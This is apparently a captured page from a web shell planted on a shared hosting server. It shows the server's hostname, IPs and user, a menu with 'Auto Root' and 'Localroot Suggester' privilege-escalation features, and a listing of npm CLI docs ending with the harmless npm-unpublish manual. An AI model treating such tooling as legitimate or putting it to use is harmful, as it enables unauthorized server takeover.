Linux worldls-302.fr.planethoster.net 4.18.0-553.8.1.lve.el7h.x86_64 #1 SMP Thu Jul 4 15:19:33 UTC 2024 x86_64
LiteSpeed
Server IP : 10.185.0.203 & Your IP : 216.73.216.32
Domains :
Cant Read [ /etc/named.conf ]
User : gerathty
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
local /
lib /
node_modules /
npm /
doc /
cli /
Delete
Unzip
Name
Size
Permission
Date
Action
npm-access.md
2.47
KB
-rw-r--r--
2017-11-28 04:37
npm-adduser.md
2.68
KB
-rw-r--r--
2017-11-03 01:22
npm-bin.md
288
B
-rw-r--r--
2017-11-03 01:22
npm-bugs.md
890
B
-rw-r--r--
2017-11-03 01:22
npm-build.md
476
B
-rw-r--r--
2017-11-03 01:22
npm-bundle.md
339
B
-rw-r--r--
2016-10-13 09:50
npm-cache.md
2.56
KB
-rw-r--r--
2017-11-03 01:22
npm-completion.md
797
B
-rw-r--r--
2017-11-03 01:22
npm-config.md
1.39
KB
-rw-r--r--
2017-11-03 01:22
npm-dedupe.md
1.33
KB
-rw-r--r--
2017-11-03 01:22
npm-deprecate.md
719
B
-rw-r--r--
2017-11-03 01:22
npm-dist-tag.md
2.71
KB
-rw-r--r--
2017-11-03 01:22
npm-docs.md
989
B
-rw-r--r--
2017-11-03 01:22
npm-doctor.md
4.54
KB
-rw-r--r--
2017-11-03 01:22
npm-edit.md
850
B
-rw-r--r--
2017-11-03 01:22
npm-explore.md
869
B
-rw-r--r--
2017-11-03 01:22
npm-help-search.md
807
B
-rw-r--r--
2017-11-03 01:22
npm-help.md
816
B
-rw-r--r--
2017-11-03 01:22
npm-init.md
978
B
-rw-r--r--
2017-09-28 04:27
npm-install-test.md
705
B
-rw-r--r--
2017-11-03 01:22
npm-install.md
16.45
KB
-rw-r--r--
2017-11-28 04:37
npm-link.md
2.36
KB
-rw-r--r--
2017-11-03 01:22
npm-logout.md
1.13
KB
-rw-r--r--
2017-11-03 01:22
npm-ls.md
2.14
KB
-rw-r--r--
2017-11-03 01:22
npm-outdated.md
3.34
KB
-rw-r--r--
2017-11-03 01:22
npm-owner.md
1.08
KB
-rw-r--r--
2017-11-03 01:22
npm-pack.md
724
B
-rw-r--r--
2017-11-03 01:22
npm-ping.md
418
B
-rw-r--r--
2017-11-03 01:22
npm-prefix.md
460
B
-rw-r--r--
2017-09-28 04:27
npm-profile.md
2.82
KB
-rw-r--r--
2017-11-03 01:22
npm-prune.md
728
B
-rw-r--r--
2017-11-03 01:22
npm-publish.md
2.66
KB
-rw-r--r--
2017-11-03 01:22
npm-rebuild.md
389
B
-rw-r--r--
2017-11-03 01:22
npm-repo.md
662
B
-rw-r--r--
2017-11-03 01:22
npm-restart.md
757
B
-rw-r--r--
2017-09-28 04:27
npm-root.md
275
B
-rw-r--r--
2017-11-03 01:22
npm-run-script.md
3.08
KB
-rw-r--r--
2017-11-28 04:37
npm-search.md
2.71
KB
-rw-r--r--
2017-11-03 01:22
npm-shrinkwrap.md
690
B
-rw-r--r--
2017-11-03 01:22
npm-star.md
461
B
-rw-r--r--
2017-11-03 01:22
npm-stars.md
458
B
-rw-r--r--
2017-11-03 01:22
npm-start.md
586
B
-rw-r--r--
2017-09-28 04:27
npm-stop.md
271
B
-rw-r--r--
2017-09-28 04:27
npm-team.md
1.75
KB
-rw-r--r--
2017-11-03 01:22
npm-test.md
296
B
-rw-r--r--
2017-11-03 01:22
npm-token.md
2.74
KB
-rw-r--r--
2017-11-28 04:37
npm-uninstall.md
1.35
KB
-rw-r--r--
2017-11-03 01:22
npm-unpublish.md
1.22
KB
-rw-r--r--
2017-11-03 01:22
npm-update.md
3.34
KB
-rw-r--r--
2017-11-03 01:22
npm-version.md
4.23
KB
-rw-r--r--
2017-11-03 01:22
npm-view.md
2.93
KB
-rw-r--r--
2017-11-03 01:22
npm-whoami.md
268
B
-rw-r--r--
2017-11-03 01:22
npm.md
5.21
KB
-rw-r--r--
2017-11-03 01:22
Save
Rename
npm-unpublish(1) -- Remove a package from the registry ====================================================== ## SYNOPSIS npm unpublish [<@scope>/]<pkg>[@<version>] ## WARNING **It is generally considered bad behavior to remove versions of a library that others are depending on!** Consider using the `deprecate` command instead, if your intent is to encourage users to upgrade. There is plenty of room on the registry. ## DESCRIPTION This removes a package version from the registry, deleting its entry and removing the tarball. If no version is specified, or if all versions are removed then the root package entry is removed from the registry entirely. Even if a package version is unpublished, that specific name and version combination can never be reused. In order to publish the package again, a new version number must be used. With the default registry (`registry.npmjs.org`), unpublish is only allowed with versions published in the last 24 hours. If you are trying to unpublish a version published longer ago than that, contact support@npmjs.com. The scope is optional and follows the usual rules for `npm-scope(7)`. ## SEE ALSO * npm-deprecate(1) * npm-publish(1) * npm-registry(7) * npm-adduser(1) * npm-owner(1)